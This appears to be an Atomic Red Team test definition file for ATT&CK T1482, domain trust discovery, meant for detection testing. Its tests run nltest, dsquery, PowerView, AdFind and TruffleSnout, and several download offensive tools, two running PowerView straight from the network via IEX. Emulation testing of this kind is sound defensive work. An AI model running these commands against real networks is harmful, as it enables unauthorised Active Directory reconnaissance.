attack_technique: T1482 display_name: Domain Trust Discovery atomic_tests: - name: Windows - Discover domain trusts with dsquery auto_generated_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f description: | Uses the dsquery command to discover domain trusts. Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role. supported_platforms: - windows executor: command: | dsquery * -filter "(objectClass=trustedDomain)" -attr * name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe description: | Uses the nltest command to discover domain trusts. Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role. This technique has been used by the Trickbot malware family. supported_platforms: - windows dependencies: - description: | nltest.exe from RSAT must be present on disk prereq_command: | WHERE nltest.exe >NUL 2>&1 get_prereq_command: | echo Sorry RSAT must be installed manually executor: command: | nltest /domain_trusts nltest /trusted_domains name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 description: | Use powershell to enumerate AD information. Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role. supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: | PowerView PowerShell script must exist on disk prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1" - description: | RSAT PowerShell AD admin cmdlets must be installed prereq_command: | if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } get_prereq_command: | Write-Host "Sorry RSAT must be installed manually" executor: command: | Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1" Get-NetDomainTrust Get-NetForestTrust Get-ADDomain Get-ADGroupMember Administrators -Recursive ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() name: powershell - name: Adfind - Enumerate Active Directory OUs auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: - windows input_arguments: optional_args: description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. type: string default: dependency_executor_name: powershell dependencies: - description: | AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe) prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=organizationalUnit) #{optional_args} name: command_prompt - name: Adfind - Enumerate Active Directory Trusts auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834 description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: - windows input_arguments: optional_args: description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. type: string default: dependency_executor_name: powershell dependencies: - description: | AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe) prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -gcb -sc trustdmp name: command_prompt - name: Get-DomainTrust with PowerView auto_generated_guid: f974894c-5991-4b19-aaf5-7cc2fe298c5d description: | Utilizing PowerView, run Get-DomainTrust to identify domain trusts. Upon execution, progress and info about trusts within the domain being scanned will be displayed. supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose name: powershell - name: Get-ForestTrust with PowerView auto_generated_guid: 58ed10e8-0738-4651-8408-3a3e9a526279 description: | Utilizing PowerView, run Get-ForestTrust to identify forest trusts. Upon execution, progress and info about forest trusts within the domain being scanned will be displayed. supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose name: powershell - name: TruffleSnout - Listing AD Infrastructure auto_generated_guid: ea1b4f2d-5b82-4006-b64f-f2845608a3bf description: | Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout supported_platforms: - windows input_arguments: trufflesnout_path: description: Path to the TruffleSnout executable type: path default: PathToAtomicsFolder\..\ExternalPayloads\TruffleSnout.exe domain: description: Domain name to search on type: string default: '%userdomain%' dependency_executor_name: powershell dependencies: - description: | TruffleSnout.exe must exist on disk at specified location (#{trufflesnout_path}) prereq_command: | if (Test-Path "#{trufflesnout_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{trufflesnout_path}") -Force | Out-Null Invoke-WebRequest -Uri "https://github.com/dsnezhkov/TruffleSnout/releases/download/0.5/TruffleSnout.exe" -OutFile "#{trufflesnout_path}" executor: command: | "#{trufflesnout_path}" forest -n #{domain} "#{trufflesnout_path}" domain -n #{domain} name: command_prompt